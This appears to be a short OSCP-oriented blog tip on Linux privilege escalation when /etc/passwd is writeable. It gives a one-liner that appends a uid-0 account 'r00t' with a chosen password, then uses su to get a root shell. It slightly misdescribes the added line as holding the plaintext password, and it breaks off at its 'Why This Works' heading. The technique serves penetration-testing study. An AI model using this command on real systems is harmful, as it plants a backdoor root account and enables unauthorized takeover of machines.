OSCP Quick Hacktricks | Linux: writeable /etc/passwd

Privilege Escalating when /etc/passwd Is Writeable

Photo by Gabriel Heinzer on Unsplash

NOTE: If you are not a member but still want to read this, CLICK HERE to read it for free!

The Trick

On rare occasions, you will find /etc/passwd to be writeable on the target Linux machine. Escalating in this case is simple, if you know what you are doing. Furthermore, enumeration tools such as LinPeas will also highlight it to you, as this should be a surefire way to gain root privileges.

All you need to do is run:

pw=$(openssl passwd Password123); echo "r00t:${pw}:0:0:root:/root:/bin/bash" >> /etc/passwd

On the target machine. These two commands define a variable pw to be the chosen password (in this example Password123, but you can choose whatever you like) and then creates a new line in /etc/passwd containing

r00t:Password123:0:0:root:/root:/bin/bash

Similarly, to the password, you can choose the username you want, but in this example, r00t is used. This enables you to run:

su r00t

Now you input Password123 as the password, and you have a root shell!

Why This Works